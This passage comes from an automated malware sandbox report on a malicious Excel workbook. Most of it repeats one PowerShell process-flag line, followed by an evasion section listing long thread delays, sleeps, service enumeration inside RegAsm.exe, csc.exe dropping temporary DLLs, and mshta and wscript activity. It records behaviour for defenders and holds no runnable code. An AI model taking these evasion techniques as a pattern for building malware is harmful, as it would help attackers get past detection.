                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: 037002451082_10142024.xlsStream path 'Workbook' entropy: 7.99773217234 (max. 8.0)
                  Source: 7D330000.0.drStream path 'Workbook' entropy: 7.99771293724 (max. 8.0)

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040F7E2 Sleep,ExitProcess,31_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,31_2_0041A7D9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4827Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1363Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5709Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2420Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1010Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1742Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3103Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2416Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1686
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2297
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1520
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2271
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9037
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1695
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 864
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 967
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1278
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3252
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.2 %
                  Source: C:\Windows\System32\mshta.exe TID: 3476Thread sleep time: -420000s >= -30000sJump to behavior
